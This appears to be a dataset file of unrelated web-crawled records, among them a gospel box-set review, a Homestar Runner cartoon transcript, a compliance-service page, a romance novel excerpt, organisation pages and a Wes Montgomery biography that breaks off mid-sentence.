id
stringlengths
50
55
text
stringlengths
54
694k
global_05_local_5_shard_00002591_processed.jsonl/39061
New York City Summary Everything you need to understand or teach New York City. • 3 Student Essays Study Pack The New York City Study Pack contains: Essays & Analysis (3) 327 words, approx. 2 pages " New York vs Las Vegas " Both, New York and Las Vegas are famous and very visited cities in the United States. Yet, both of them are completely different. New York is a cosmopolitan and high popula... Read more 784 words, approx. 3 pages New York City has many cultures and billions of places to visit. It would take someone years to visit everything in New York City... it may be impossible. But NYC is always awake and always waiting fo... Read more 322 words, approx. 2 pages New York City vs. Los Angeles For many years now, there has been an ongoing comparison of Los Angeles, California and New York City, New York. In some ways, these two major cities are very similar. ... Read more
global_05_local_5_shard_00002591_processed.jsonl/39072
Tuesday, June 26, 2018 Donald Bradburn: The Gospel Collection This was absolutely irresistible when I saw it at the thrift store for 25 cents. It's not just one album from Donald Bradburn, it's a whole fucking box set of TWELVE albums! That's a bargain of just over two cents per album! It doesn't matter if the albums are shit, it's the fact that it was so damn cheap! I hit the gospel jackpot! Here's something to put all of this in perspective... Donald Bradburn recorded more albums than Roxy Music. Suck on that Brian Ferry, Donald Bradburn is a true music making machine! Donald Bradburn's wife and child are on the cover of this box set, and since there's no other credits listed, it's my guess that the lineup goes something like this: Donald Bradburn: Vocals & Guitar Mrs. Bradburn: Bass Guitar Baby: Drums The quality of the recordings are.... Well.... they range from kinda shitty to kinda not shitty. When I bought this, I had no clue how the hell I was going to tackle it. There's so much music here! I eventually decided to pick one song off each cassette and feature it here as a collection of Donald Bradburn's greatest un-hits. Let's go over some of these songs... (All featured songs can be downloaded in one zip file here!) Album: A Prayer For My Children Song: My God is Real We had to start it with a catchy number, muddy quality, and a drum that sounds like someone beating their brother's head into the wall. The lead guitar is buried in the back yard as if it doesn't matter, and Mr. Bradburn is slightly off-key. Great fucking song. Album: Sweet Anointing Song: Sweet Anointing The tape recorder appears to have eaten some of the beginning of this song for lunch which is all fine since none of the band seemed to know how the hell the song started anyway. The band members fall asleep on and off throughout this one, and I can't say I blame them. It's over six minutes long and would be boring as shit if it weren't for all the mistakes in it. The keyboard solo sounds as if a drunken fool tripped over the power cable, landed on top of the Casio, and engaged in an intoxicated makeout session. This song is terrible, and would have been better left in the trashcan after the tape player chewed it up. Album: Never Be Alone Song: Not Just An Old Story If you're going to mix your drummer louder than everything else, he'd better be a damn good drummer. I can fall down the stairs with better timing than whoever's pounding that fucking thing. This song is depressing and boring, just like most of the other shit on this album. Album: Heaven Bound Song: Jesus Is Your Healer The chords and beat are the exact same as the last song, the lyrics simple and awful, so the gold star for effort will have to go to somebody else. On the plus side, the band isn't drunk this time. Album: Songs of Comfort Song: There Is Coming a Day Hello? Mr. Bradburn? Are you outside, or is your microphone level just a bit too low? The album should have been called "Songs of Southern Comfort". On the plus side, the quality of the recording is fairly crisp here. The song is still slow and boring though. Remember the good old days of the first song and how upbeat it was? It seems so long ago now... Album: Only Thru The Cross Song: True Lord The album should have been called "Only Drive-Thru The Cross for a McJesus Meal". This time, we get a raw recording of the band with minimal effects. There is also a drop-out in the right channel during the song, and I have no clue if it's on the recording, if it's a faulty wire in my setup, and I really don't give a shit either way. You get what you get. It's five minutes long and I'm not listening to this slow piece of crap again just to make sure I got a good transfer. Album: When I Crossed That River Song: A Million Tears or More All the songs on this album are slow, boring, and interchangeable so you're not going to miss anything by not listening to the rest of it. Unlike the last album, we have some nice reverb on Mr. Bradburn's vocals, but the rest of the band seems to be playing at the bottom of the river they were crossing. Album: The Lighthouse Song: My Jesus I Love Thee Try as he may, Mr. Bradburn cannot seem to stretch his vocal chords enough to reach those high notes. Also, I think the right channel is there, but perhaps someone accidentally stuck the speaker into their rectum, causing the sound to be shitty. According to my notes, this is the worst album of the lot so if you happen to find this magnificent box set, you can throw this cassette into the trash or record some Porter Wagoner onto it. You get to hear the song "At Calvary" twice just because it's so fucking awesome. Album: Not Now But In The Coming Years Song: Glory To The Father Son & Holy Ghost You're getting two songs off this one! Here's Mr Bradburn singing in Cree! He sounds like he's had a couple of beers to make this one go down your ear canals a little smoother. Song: Draw Me Nearer Pick up those boogie shoes and fall onto the dance floor! We have an upbeat one here and it's about fucking time!!! It's in Cree so you can't understand it, but who gives a shit? The guitar player is drunk as fuck and the beat is catchy as hell. Play this one twice because it's better than the last 8 songs I gave you. Album: Tears Song: If You Ain't Living For Jesus The entire box set should have been called "Tears". This song is kinda catchy until you get to the middle part where everybody seemingly gets run over by a tractor. As for the lyrics, I can find better lyrics in the ingredients list of a bag of Peanuts. This is by far the worst song of the bunch. Album: It's Happening Now Song: It's Happening Now Surprise! This song is actually pretty good! The production is nice, the mix is good, everybody is sober, there are no tractors killing people, and the song is actually pretty damn enjoyable with it being slightly upbeat. This might be where my whole 25 cents went. The rest of the album (or even the whole box set) doesn't live up to this track. Album: He Paid The Cost Song: He Paid The Cost I have to admit that I was done at this point. The song starts out as if it had just finished throwing up after a night of drinking wine, but that isn't why I chose it. I got sick of listening to all this shitty music and this is the first song on the tape. I just decided to say fuck screening the rest of the album and went for the first piece of shit on this tape. So there you go! This is the first box set I've reviewed, and after the daunting task of going through each of these damn cassettes, I hope it's the last one I review. I'm truly exhausted from this one. As for where I've been and what I've been doing, I ended up making a nice back log of episodes (that still need editing) for "Tech of the Century" which is the name of the show on my youtube channel where I take things apart and fix them. I also have the Junq Tour coming up which is exciting, and this year I bought a camper to sleep in. It came with an 8-track player installed, so I'm hoping I can get that up and running before the Junq Tour. Again, sincere apologies for the lack of updates. My new homestead needs quite a bit of work, so I'll be focusing a lot on that over the summer months. Fall and Winter should see more blog entries. There's always lots of stuff sitting in queue for me to cover, so I've slowed down a bit on my purchases and only buy things if they look truly terrible. Until next time....
global_05_local_5_shard_00002591_processed.jsonl/39078
HIPAA/PCI Gap Analysis The Payment Card Industry (PCI) Data Security Standard (DSS) enables merchants and service providers to assess their security status by using a single set of security requirements for all payment organizations. 12 information security requirements have been defined within 6 control objectives. The ISO 27002 Information Standard defines 11 clauses and the HIPAA Security Rule establishes requirements for covered entities. Is your organization impacted by PCI DSS, ISO or HIPAA requirements? How Prepared is Your Organization for Meeting Compliance Requirements? The PCI DSS, ISO and HIPAA Assessment and Gap Analysis Service enables your organization to better understand the current state of compliance and evaluate a roadmap for remediation prior to completing a formal audit. This service does not replace an audit – it does help identify and address gaps prior to a complete and comprehensive compliance audit. Connectivity Communications ProConsult Premium WordPress Themes
global_05_local_5_shard_00002591_processed.jsonl/39079
This archive contains the distribution Array-Split, version 1.173190: split an array into sub-arrays Christian Walde has dedicated the work to the Commons by waiving all of his or her rights to the work worldwide under copyright law and all related or neighboring legal rights he or she had in the work, to the extent allowable by law. Works under CC0 do not require attribution. When citing the work, you should not imply endorsement by the author. This README file was generated by Dist::Zilla::Plugin::Readme v6.010.
global_05_local_5_shard_00002591_processed.jsonl/39105
In order to qualify for membership, you must: 1. register with your own domain name; 2. have open contact information freely available; 3. respond to reasonable requests within 7 days. The simplest way to do all of the above is to simply sign up using our signup page. Note: If you do not have and/or if you do not want to register a domain name, then for that case we have a partner site where you can also verify your identity without a domain name — see the Free Zine sign-up page. 😉
global_05_local_5_shard_00002591_processed.jsonl/39118
File not found, sorry! Home | 網站地圖 | 網站地圖xml Arf! Arf! Don't worry! I'm on it! I wish I had a cookie Geez! This is pretty tiresome! Am I getting close? Or am I just going in circles? Nah... OK, I'm officially lost now... I think I saw a AG娱乐游戏 AG亚洲国际游戏游客登录 哪个AG真人网站是真的 AG8亚洲游戏 AG8国际亚游手机版 亚游国际厅 国际凯时AG优质运营商
global_05_local_5_shard_00002591_processed.jsonl/39119
Object-Theater | Performance-Lecture ‘What is a doll? Any object, any body part, any image, may become a doll: a mere pebble in the hands of an autistic child; a bundle of rags that evokes a danse macabre; some ex- votos manipulated in erotic trance; a fava bean that symbolizes death and rebirth. Dolls are sometimes secular and sometimes sacred, sometimes inanimate and sometimes animated, sometimes simulacrum and sometimes real. Reflect upon your very first doll, your most beloved doll, your most hated doll, perhaps the one whose eyes you gouged out just to see what was there behind them. Evoke your own inner doll museum. Provoke objects to lead a new life as puppets. Invoke your most profound dolls, doubles, and demons. The doll is familiar and frightening, magical and mysterious. It separates me from myself, multiplies my personality, and exposes my unconscious to the world.‘  Thursday 28 June 2012 19:00 | Grand Théâtre de Luxembourg
global_05_local_5_shard_00002591_processed.jsonl/39139
Strong Bad is a Bad Guy From Homestar Runner Wiki Revision as of 22:59, 26 May 2020 by (Talk) Jump to: navigation, search Toon Category: Shorts watch Sick Day 500 The Cheats Bad Guy Tattoo The Brothers Chaps go back to their roots with Mario Paint. Strong Bad, Strong Mad and The Cheat talk about tattoos. Cast (in order of appearance): Strong Mad, Strong Bad, The Cheat, Marzipan, Marshie, Trogdor, Homestar Runner Places: The Field, Strong Badia, The Bar Date: Monday, October 17, 2005 Running Time: 1:44 DVD: Everything Else, Volume 1 {The following title card appears:} (made with mariopaint) {Cut to a close up of Strong Mad in the field. All mouth movements are a simple loop (a feature in Mario Paint), therefore lip-syncing is very off} {Cut to the rest of the field, revealing The Cheat and Strong Bad} STRONG BAD: {moving his left arm up and down} A glowy box? Are you sure that's what you'd get for your tattoo? {Cut to Strong Mad} {Cut to The Cheat} THE CHEAT: {The Cheat noises} {moving his right arm up and down} {Cut to a close up of Strong Bad; holding his right arm down and his left one up} STRONG BAD: I'd want mine to look like a prison tattoo that you carved out yourself with a spoon and some soap. {Cut to a muscled arm.} STRONG BAD: {voiceover} There'd be a rocket launcher, of course,— {A rocket launcher appears on the arm with a "donk" sound effect.} STRONG BAD: —and above that it'd just say, "Bad Guy." {The words "BAD GUY" are written in yellow above the rocket launcher as Strong Bad says them. Music begins.} SINGERS: Strong Bad is a bad guy, bad guy, bad guy. Strong Bad is a bad, bad man. Strong Bad hates Marzipan! Strong Bad's got the master plan, To buy a custom conversion van! Marshie is a bad guy, bad guy, bad guy. Trogdor is a bad, bad guy! {Cut back to the Field. Music ends. Homestar walks in. Soon afterwards, a close-up of Homestar.} HOMESTAR RUNNER: Hey guys! H'whatcha teekenbot? {Cut to a close-up of Strong Bad in the same pose as before.} STRONG BAD: We're talking about something cool and interesting. You wouldn't understand. {Cut to Homestar.} HOMESTAR RUNNER: Oh, tattoos, huh? I'd get one on my forearm {the bulging arm, now blank, reappears, and tattoos appear on it as Homestar talks} that said, "The For Real Deal", {appears on the forearm} and has a picture of me dressed up like Uncle Sam. {appears underneath the text} {Cut to Strong Bad.} STRONG BAD: You'd get one on your forearm, huh? {Cut to Homestar.} HOMESTAR RUNNER: Or one on my bulging bicep that just says "Cake Man". {the bulging arm reappears with the tattoos from before, with "cakeman" on it in crude blue script; cut back to Homestar} Ooh, or a glowy box on my wrist... {Cut to Strong Bad talking to The Cheat.} STRONG BAD: I just don't have the heart to tell him. STRONG MAD: YOU DON'T HAVE AR— {Cut to the bulging arm with a "THE END" tattoo and a rocket launcher tattoo above it, then changes to a black screen that says "done."} Easter Eggs "Tattoo Idea #26" • Click the screen when The Cheat is talking to see tattoo idea #26: "some kinda snake lady killing some kinda snake". • Click on The Cheat after Homestar says "A glowy box on my wrist" to see a drawing of a box with the caption "Glowy box 4 ever". Fun Facts • Strong Bad's desire to have a tattoo that "you carved out yourself with a spoon and some soap" combines to the old prison clichés of creating improvised weapons and creating carvings from soap. • This is the only toon made entirely in Mario Paint (an SNES game) to be released since Super NES, which was made almost ten years prior to this toon. This toon's main page message read "back to our roots", alluding to this. • Actual "prison tattoos" are usually made with a regular sewing needle and a thread which is saturated with ink, typically from a ballpoint pen. This results in a tattoo made up of short lines, which will often have a "stitched" look. • This toon took the shortest amount of time for any toon to come to DVD, as Everything Else, Volume 1 was released less than a month later. • Homestar's propeller is missing, as in the original Super NES cartoon. • No paint appears on Marzipan's poster as Strong Bad spray-paints it. • The glowy box Easter egg is clickable from when it appears until the end of the toon. • The "X" close button doesn't appear until the title goes away. Inside References • Strong Bad beats a muffler with a pipe. In no loafing, Strong Mad is inspired to do the same thing. • Strong Bad spray-painting the poster of Marzipan may be a reference to origins, in which he did the same thing to the real Marzipan. • The ascending group of three quick notes in the "Strong Bad is a Bad Guy" song is taken from the Teen Girl Squad theme, although the synthesizer seems to be the one used in TROGDOR!. They can be heard the clearest before the first line of dialogue. • During the song, Strong Bad performs the Double Deuce. • The way that Strong Bad and Strong Mad are drawn closely resembles the sketch "viewtiful brothers strong" from the sketchbook. These drawings are done in the style of the video game Viewtiful Joe. • The onomatopoeia explosion "Dooj" was heard previously in the song "The System is down" and the DVD Sketchbook. • The "master plan" to buy a "custom conversion van" echoes Strong Bad is in Jail Cartoon, when Strong Bad uses his powers of persuasion to influence The Cheat into pulling one more caper, and "blow the college fund on a really tricked out van". In the DVD commentary for said toon, Matt Chapman refers to it as "a recurring dream of [Strong Bad's]". • Strong Mad's tactless "YOU DON'T HAVE AR—" comment is yet another reference to several characters' lack of visible arms. Real-World References • Uncle Sam is a national personification of the United States. • In the movie Rocky, Rocky's opponent, the character Apollo Creed (played by Carl Weathers), was known as "The Real Deal", and he dressed as an exaggerated, stylized caricature of Uncle Sam when he came out to the ring before their climactic fight. • The Rocket Launcher tattoo reading "Bad Guy" may be a reference to the movie Scarface. In the film, crime boss Tony Montana has a famous speech where he refers to himself as "the Bad Guy", and in the climactic scene fires a rocket launcher at his enemies. • Custom conversion vans have been seen in such shows as the A-Team. • The term "vantastic" is a possible reference to the band Piebald who describe their tour van using the same word. See Also External Links Personal tools
global_05_local_5_shard_00002591_processed.jsonl/39143
[IP] First A1C results after beginning the pump Hello everyone, I am so excited about my first A1C result, I had to let you know....On October 1, 2000 my A1C was a horrid 10.2, I began the pump on October 15, 2000 (2 weeks later). On December 20, 2000, my A1C was 6.2 !!!! I couldnt believe it...My doctor was shocked also...Personally, achieving that result was so simple comparitively to MDIs. send a DONATION http://www.Insulin-Pumpers.org/donate.shtml
global_05_local_5_shard_00002591_processed.jsonl/39145
Tag Archives: sales lead generation B2B Marketers and Their Modern Scruples There used to be a time when B2B marketers worried about the finer points of the sales process. “Did I say the right thing?” “Were these the numbers they wanted to see?” “Do these people trust me?” Today, the first thing they worry about is whether or not the numbers are high enough whether it’s the data churned out by their CRM system, the number of emails they’ve sent, or how the links they’ve peppered across the net. What’s odd is not just how these things may have little to do with the quality of your marketing messages or whether your prospect is actually all that eager to do business with you. It’s the fact that even tech companies are trying to eliminate these scruples and take everything back to how it used to be. Continue reading How Armed Are Your Lead Generators? You might think the title is suggesting something crazy but don’t be fooled. Today, everyone is a combatant. You might not see it as you’re sitting there in the comfort of either corner office or cubicle but there is definitely a battle going on. Because really, you’d be lying to yourself if you think the internet can’t be a very dangerous place for lead generators. Continue reading Generating Sales Leads from a Halftime Niche For serious sports fan, things like half-time shows and ad spots are nothing more than the necessary evils meant to finance their love for a game. But you know, they’re really not the only ones in the audience. It’s not like everyone’s a big fan of the fans either. But when things like a mom’s favorite afternoon soap or a kid’s regular cartoon gets disrupted by the big ‘ol Superbowl, they really don’t have much of a say compared to the majority of the sporting fanbase. (No offense to all the football fans out there.) Fortunately, that’s where the second purpose of these little sideshows comes in. They have become what you might call the halftime niche. What’s more incredible though is that this same niche could include your own target market of business decision makers. Continue reading Can Lead Generators Help Insiders Out of their Cliques? For many lead generators, getting a prospect that is loved by the sales rep is already a noble pursuit. Compatibility between prospect and representative seem to be the decisive factor between a smooth, successful sales process and a department that’s viciously torn in two. On the other hand, are the same lead generators really making a difference when they’re constantly called match like with like? Are different organizations completely defined by the common interests of just the salesperson in one and the single decision maker in the other? What if they’re both just in the same comfort zone and aren’t really helping either organization as a whole? Continue reading Continue reading
global_05_local_5_shard_00002591_processed.jsonl/39148
Episode #80: “Going deep on Hanukkah. And sunscreen.” Can Jews get depressed during the holidays or is that exclusively a gentile thing? Can you really put nine people on a stage and call it a debate? What’s the best way to go bald? Join the boys as they Take a long look at the Festival of Lights comparing the Hanukkah experience to the Christmas experience, casting no aspersions on Jews with Christmas trees and debating whether Jews can feel the seasonal pressure that sometimes plagues their non-Jewish friends, especially given that they get eight presents, not one. Fair fight? About Larry Rosen
global_05_local_5_shard_00002591_processed.jsonl/39155
Tuesday, July 14, 2015 New Release Alert: Portrait of a Girl by Luanna Stewart - Excerpt & Giveaway Portrait of a Girl Blitz Banner Portrait of a Girl Publication Date: July 14, 2015 Genres: Romance, Suspense   Portrait of a Girl Cover AmazonAmazon UKAmazon CAB&NKoboiBooks An old crime and an irresistible new lead... When her wealthy art dealer father died, Heather James was expecting a fortune. Instead, his bank account was empty and Heather's working in a bakery, wondering exactly what happened to her father's millions...until someone tries to kill her. Tony Simons is on the trail of an art theft cold case that's practically giving him frostbite. He's hoping that by sticking close to Heather - the daughter of his deceased prime suspect - he'll find the answers he needs. Instead, he's finding himself distracted by a gorgeous woman who drives him crazy in every way imaginable... Now Tony's in serious trouble. Even if Heather can't - or won't - tell him where the stolen paintings and money are, she may well have stolen his heart. And now someone wants her dead... Add to Goodreads “Sit down, Heather. Let’s chat.” Her mouth dried instantly, and her heart threatened to beat its way out of her chest. Wobbly knees that verged on giving out barely got her to the chair. She slouched down and stuck her hands into her coat pockets, trying to make herself appear as small and nonthreatening as possible. Her icy fingers encountered her phone and she whipped it out, frantically trying to punch 9-1-1. Everything seemed to move in slow motion. Her muscles didn’t respond to her brain’s commands. He plucked the phone from her hands and turned it off before tossing it onto the counter. He sat across from her and rested his elbows on the table, keeping his gaze on his folded hands. “So tell me again why you were in the basement.” She had to clear her throat a few times before her voice worked. Delilah seemed to sense her distress, because she sat next to her and put her head in Heather’s lap. She stroked the dog’s large silky ears, and her heart slowed to a more normal rate. “Well—” “The truth. What were you doing down there?” “Of course I’ll tell you the truth. I don’t lie or deceive. Not like some people.” His eyebrows raised, then dropped into a deep scowl. So maybe it wasn’t smart to start a war of words. “Well, as I started to say before I was so rudely interrupted, I’m missing some—ah—papers of my father’s.” He sat up straighter, his gaze so focused it felt like he could read her thoughts before she thought them. She cleared her throat and forged ahead. “I was sure I had everything when I moved into the gatehouse, but I’m missing some—papers. I thought perhaps there were more boxes in the basement. I’d planned to take a quick peek and be out of there before you got home, and you’d never have to know. Since it upsets you so much. For some strange reason.” He leaned across the table, an intense gleam in his eye. “And did you find what you were looking for?” “Pfft, no. There’s nothing down there except spiders and dust. So like I said, sorry to bother you.” She rose from her chair. His hand clasped her wrist. “What are you doing?” she gasped, pulling against his grip. “You must have heard me putting that lock on the outside door. I made plenty of noise. Why didn’t you call out?” She continued to tug and twist but it was no use. He was too strong. His hand completely circled her wrist. She was alone in the house with a man who could overpower her and do whatever he wanted. If she screamed, no one would hear. All the questions she had about who he really was came stampeding into her consciousness. She was seriously in danger of peeing her pants. “I knew you’d be upset, and I was trying to think of another way out.” Keep talking and think of a way to get out of this mess. “How did that work for you?” His hold relaxed, and he commenced rubbing his thumb against the inside of her wrist. That’s where the shiver started. It traveled along her arm and settled low in her belly. No, no, no, she was not getting turned on. She really, really needed to get out of this house. Now. “Not—not so good.” He raised an eyebrow and tugged lightly on her arm, moving her slowly around the table to stand directly in front of him. Standing over him gave her an advantage. She wished she knew how to do one of those flying karate kicks. But she didn’t. And besides, she was afraid it would hurt him. “Is there anything else you’d like to tell me?” He continued his light caress, his dark eyes growing darker. He grinned, a small dimple creasing his cheek, right next to his mouth. His full, classically shaped lips surrounded by a day’s growth of dark beard parted to reveal a gleam of white teeth. She wanted to tell him everything, every worry, every question. Maybe he could make sense of it, or at least offer some comfort. The cut on his cheek from the cemetery reminded her that too much weird stuff had been happening. Ever since she arrived in Portland. Panic tightened her chest. No, the weird stuff started when Tony moved into the big house. About Luanna Stewart Luanna Stewart Luanna Stewart has been creating adventures for her imaginary friends since childhood. As soon as she discovered her grandmother's stash of medical romance novels, all plots had to lead to a happily-ever-after. Luanna writes full time, concentrating on sexy romantic suspense, steamy paranormal romance, and spicy historical romance. Born and raised in Nova Scotia, Luanna now lives in Maine with her dear husband, two college boys, two cats, and one surviving gold fish. When she's not torturing her heroes and heroines, she can be found in her kitchen whipping up something chocolate. Writing under the pen name Grace Hood, she has two novellas published with The Wild Rose Press. Now she is super excited to have a book published under her own name with Entangled Publishing.
global_05_local_5_shard_00002591_processed.jsonl/39177
Coupon for Nanach.Net Wednesday, December 21, 2011 Chanukah is the Triumph of the Truth ‎"The main mitzvah of the Chanukah light is to light and illuminate the light of Truth in the world, so that everyone will merit to know where is the True Tzaddik, who is the chosen and true head amongst all the Tzaddikim. For the main miracle of Chanukah is that the evil kingdom, an aspect of falsehood, a slave, the serpent's poison, was subjugated and that the Kingdom of Holiness of Israel, who are the aspect of the King's son, the aspect of Truth, was strengthened and elevated. One should intend in lighting the Chanukah light that through this we shall merit to draw down the illumination of Truth and to draw near to the point of Truth always." ---from Ibey Hanachal No comments:
global_05_local_5_shard_00002591_processed.jsonl/39181
N.I.G is a socio-cultural and the umbrella organisation of all Igbo associations in Germany The Executive council is elected from among the members of the Delegates Assembly or candidates as maybe nominated by member unions. N.I.G Executive Council is made up of the following officers: 1. The Coordinator  2. The Deputy Coordinator  3. The Secretary General  4. The Deputy Secretary General   5. The Financial Secretary  6. The Treasurer  7. The Social and Cultural Officer  8. The Public Relations Officer  9. The Provost The Executive Council has the power to perform the following functions: • Carry out the resolutions of the Delegates Assembly  • Be responsible for organizing the Delegates Assembly meeting, general congress and other administrative affairs of NIG • Prepare the annual budget of NIG and present same to the Delegates Assembly for approval • Bring to the notice of the Delegates Assembly and the Board of Trustees any issue or compliant that affects NIG for deliberation • Manage the administrative affairs of NIG including the maintenance of its secretariat N.I.G Executive Line up Engr. Oge Ozofor Joe-Blase Nnaemeka Akanazu Mr Anthony Dominic Che Chidi Chukwumerije Nze Valentine Onwuka Mr Prince Urigwe
global_05_local_5_shard_00002591_processed.jsonl/39198
Progarchives, the progressive rock ultimate discography Deep Purple - 24 Carat Purple CD (album) cover Deep Purple 3.35 | 47 ratings From, the ultimate progressive rock music website Special Collaborator Honorary Collaborator 4 stars This compilation is the great one. Just don't forget, that this album was issued in 1975, in time when Deep Purple was still great acting band, not history. Another moment - it's a vinyl, produced in time when no-one had idea about CD-era. So -yes, it's too short for "Best of.." classic format, but it was usual fact in LP time. But all other things are OK - you have there almost all great songs from the best band line-up and golden age of musicianship. For sure, we have many more different DP collections now, with much more bigger track list,better sound, etc. But don't you forget, that this album has it's historical value - it was made as eveidence of band stardom right in time. So, for sure, you have no reason to have this album if you're not a DP fan. All songs are classic and presented on original albums or other compilations. And compilation with just 8 short songs looks a bit strange in nowadays. But for fans and collectors this album has it's value as artifact,evidence from Deep Purple glory days. P.S. This was first ever DP album I listened still as schoolboy. And I remember it's golden cover and Gillan voice in "Child In Time"till now. In fact ,it was one of strong reasons for me to come to the world of rock music! snobb | 4/5 | Forum user Forum password Share this DEEP PURPLE review Social review comments () BETA Review related links
global_05_local_5_shard_00002591_processed.jsonl/39202
Wes Montgomery Wes Montgomery born on 6/3/1923 in Indianapolis, IN, United States died on 15/6/1968 in Indianapolis, IN, United States Alias John Leslie "Wes " Montgomery Wes Montgomery From Wikipedia, the free encyclopedia. John Leslie "Wes" Montgomery (March 6, 1923 – June 15, 1968)[1] was an American jazz guitarist. He is widely considered one of the major jazz guitarists, emerging after such seminal figures as Django Reinhardt and Charlie Christian and influencing countless others. Montgomery was known for an unusual technique of plucking the strings with the side of his thumb which granted him a distinctive sound. He often worked with his brothers Buddy (piano and vibes) and Monk (bass guitar), and with organist Jimmy Smith. Montgomery's recordings up to 1965 were generally oriented towards hard bop, soul jazz, and post bop, while circa 1965 he began recording more pop-oriented instrumental albums that featured less improvisation but found mainstream success. His later-career guitar style is a major influence on fusion and smooth jazz. Montgomery toured with Lionel Hampton early in his career; however, the combined stress of touring and being away from family took him back home to Indianapolis. To support his family of eight, Montgomery worked in a factory from 7:00 am to 3:00 pm, then performed in local clubs from 9:00 pm to 2:00 am. Cannonball Adderley heard Montgomery in an Indianapolis club and was floored. The next morning, he called record producer Orrin Keepnews, who signed Montgomery to a recording contract with Riverside Records. Adderley later recorded with Montgomery on his Cannonball Adderley and the Poll-Winners (1960) album. Montgomery recorded with his brothers and various other group members, including the Wynton Kelly Trio which previously backed up Miles Davis. Following the early work of swing / pre-bop guitarist Christian and gypsy-jazz guitarist Django Reinhardt, Wes joined Tal Farlow, Johnny Smith, Jimmy Raney, and Barney Kessel to put guitar on the map as a bebop / post-bop instrument. While these men generally curtailed their own output in the 1960s, Montgomery recorded prolifically during this period, lending guitar to the same tunes contemporaries such as John Coltrane and Miles Davis were recording. John Coltrane asked Montgomery to join his band after a jam session, but Montgomery continued to lead his own band. Boss Guitar (1963) seems to refer to his status as a guitar-playing bandleader. He also made contributions to recordings by Jimmy Smith. Jazz purists relish Montgomery's recordings up through 1965, and sometimes complain that he abandoned hard-bop for pop jazz toward the end of his career, although it is arguable that he gained a wider audience for his earlier work with his soft jazz from 1965 to 1968. During this late period he occasionally turned out original material alongside jazzy orchestral arrangements of pop songs. In sum, this late period earned him considerable wealth and created a platform for a new audience to hear his earlier recordings. To many, Montgomery's playing defines jazz guitar and the sound that students try to emulate. Jazz guitarist Bobby Broom, in a video history of Montgomery's impact on musicians and guitarists in Jazz, notes: Montgomery is the grandfather of actor Anthony Montgomery.[1][4] Recording career Almost all of Montgomery's output on Riverside featured the guitarist in a small group setting, usually a trio (and always with his organist from his Indianapolis days, Melvin Rhyne), a quartet, or a quintet, playing a mixture of hard-swinging uptempo jazz numbers and quiet ballads. The lone exception, Fusion! Wes Montgomery with Strings (1963), telegraphed his post-Riverside career: it was his first recording with a string ensemble. One of the more memorable sets involved a co-leadership collaboration with vibraphone virtuoso and Modern Jazz Quartet mainstay Milt Jackson, whom producer Orrin Keepnews has said insisted on a collaboration with Montgomery as a condition for signing a solo recording deal with Riverside. Montgomery never abandoned jazz entirely in the Verve years, whether with a few selections on most of the Verve albums, or by such sets as 1965's Smokin' at the Half Note, showcasing two appearances at the New York City club with the Wynton Kelly Trio, or a pair of albums that he made with jazz organist Jimmy Smith, Jimmy & Wes: The Dynamic Duo (1966) and Further Adventures of Jimmy and Wes (1968). He continued to play outstanding live jazz guitar, as evidenced by surviving audio and video recordings from his 1965 tour of Europe. As a considered founder of the smooth jazz school, the Verve album Bumpin' (1965) represents a model from which many modern recordings are derived: as the liner notes to the CD remaster issue note, after being unable to produce the desired results by the guitarist and orchestra playing together, arranger Don Sebesky suggested Montgomery record the chosen music with his chosen small group, after which Sebesky would write the orchestral charts based on what Montgomery's group had produced. The orchestral parts were then recorded separately from Montgomery. By the time Montgomery released his first album, A Day in the Life (1967), for A&M Records, he had seemingly abandoned jazz entirely for the more lucrative pop market, though as in his Verve period he played his customary jazz in small group settings in live appearances. The three albums released during his A&M period (1967–68), under longtime jazz producer Creed Taylor (Bethlehem Records, ABC-Paramount Records, Verve Records, CTI Records), feature Sebesky's orchestral arrangements of famous pop songs ("I Say a Little Prayer", "Windy", "A Day in the Life", "Eleanor Rigby", etc.) with Montgomery using guitar octave technique to recite the melody. The A&M recordings feature all-star rhythm sections, including Herbie Hancock on piano, Hank Jones on harpsichord and piano, Ron Carter on bass, Grady Tate on drums, and Ray Barretto on percussion. Hubert Laws also appears on Down Here on the Ground (1968), the first of the A&M albums, playing flute and oboe. These were the most commercially successful records of his career, although AllMusic Guide's Michael G. Nastos wrote of Down Here on the Ground (1968): Much to either the delight or chagrin of urban or traditional jazz fans, the music changed, and Montgomery was in the middle, though his delightful playing was essentially unchanged. ... In many real and important ways, this is the beginning of the end for Montgomery as a jazz artist, and the inception of bachelor pad lounge/mood music that only lasted for a brief time. ... It does fall in that category of recordings where the musicians chose to produce, rather than create their personal brand of jazz, and is at the very least an historical footnote. Resonance Records began a series of live albums from archival recordings in 2016 with the 1959 performance One Night in Indy. On the morning of June 15, 1968, while at home in Indianapolis, Indiana, Montgomery awoke and remarked to his wife that he "didn't feel very well." He soon collapsed, dying of a heart attack within minutes. 45 years old at the time of his death, Montgomery had just returned from a tour with his quintet and was at the height of his fame, having attained a degree of popular acceptance that few jazz artists in that era achieved.[5] Montgomery's home town of Indianapolis later named a park in his honor. Montgomery had a wide influence on other noted guitarists who followed him, having also earned the respect of his contemporaries. Dave Miele and Dan Bielowsky claim, Wes Montgomery was certainly one of the most influential and most musical guitarists to ever pick up the instrument... He took the use of octaves and chord melodies to a greater level than any other guitarist, before or since... Montgomery is undoubtedly one of the most important voices in Jazz guitar that has ever lived—or most likely ever will live. A discussion of Jazz guitar is simply not thorough if it does not touch upon Wes Montgomery.[6] Many fellow jazz guitarists consider Montgomery the greatest influence among modern jazz guitarists. Pat Metheny has praised him greatly, saying "I learned to play listening to Wes Montgomery's Smokin' at the Half Note." Metheny told the New York Times in 2005 that the solo on "If You Could See Me Now", from this album is his favorite of all time. Joe Pass said, "To me, there have been only three real innovators on the guitar—Wes Montgomery, Charlie Christian, and Django Reinhardt", as cited in James Sallis's The Guitar Players and in his Hot Licks instructional video. Kenny Burrell states, "It was an honor that he called me as his second guitarist for a session." In addition, George Benson, Stevie Ray Vaughan, Eric Johnson, Joe Satriani, Jimi Hendrix, David Becker, Joe Diorio, Steve Lukather, Larry Coryell, Randy Napoleon, and Pat Martino have pointed to him numerous times as a great influence. Lee Ritenour, who recorded the 1993 album Wes Bound named after him, cites him as his most notable influence; he also named his son Wesley. Guitarist Bobby Broom chartered the group Deep Blue Organ Trio to carry on the pioneering sound that Montgomery broke open his career with in 1959: "A Dynamic New Sound for Guitar, Organ and Drums", and formed The Bobby Broom Organi-Sation in 2014 to continue that work.[7] In 1982, Bob James and Earl Klugh collaborated on a duet album and recorded the song "Wes" as a tribute to the late Montgomery on their Two of a Kind album. Pat Martino released his tribute recording to Wes on Blue Note Records in 2006 titled Remember: A Tribute to Wes Montgomery.[8] Those influenced by 